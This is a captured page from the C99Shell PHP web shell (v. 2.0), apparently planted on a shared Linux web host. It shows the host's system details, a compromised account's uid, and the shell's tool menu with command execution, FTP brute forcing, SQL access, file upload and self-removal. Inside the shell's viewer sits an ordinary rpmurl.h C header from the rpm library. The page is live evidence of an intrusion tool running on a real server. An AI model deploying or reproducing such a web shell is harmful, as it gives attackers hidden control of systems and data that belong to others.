!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/rpm/   drwxr-xr-x
Free 6182.23 GB of 6263.43 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rpmurl.h (1.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#ifndef H_RPMURL
#define H_RPMURL

/** \ingroup rpmio
 * \file rpmio/rpmurl.h
 *
 * A couple utils for URL Manipulation
 */

#ifdef __cplusplus
extern "C" {
#endif

/** \ingroup rpmurl
 * Supported URL types.
 */
typedef enum urltype_e {
    URL_IS_UNKNOWN    = 0,    /*!< unknown (aka a file) */
    URL_IS_DASH        = 1,    /*!< stdin/stdout */
    URL_IS_PATH        = 2,    /*!< file://... */
    URL_IS_FTP        = 3,    /*!< ftp://... */
    URL_IS_HTTP        = 4,    /*!< http://... */
    URL_IS_HTTPS    = 5,    /*!< https://... */
    URL_IS_HKP        = 6    /*!< hkp://... */
} urltype;

/** \ingroup rpmurl
 * Return type of URL.
 * @param url        url string
 * @return        type of url
 */
urltype    urlIsURL(const char * url);

/** \ingroup rpmurl
 * Return path component of URL.
 * @param url        url string
 * @retval pathp    pointer to path component of url
 * @return        type of url
 */
urltype    urlPath(const char * url, const char ** pathp);

/** \ingroup rpmurl
 * Copy data from URL to local file.
 * @param url        url string of source
 * @param dest        file name of destination
 * @return        0 on success, -1 on error
 */
int urlGetFile(const char * url, const char * dest);

#ifdef __cplusplus
}
#endif

#endif    /* H_RPMURL */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0119 ]--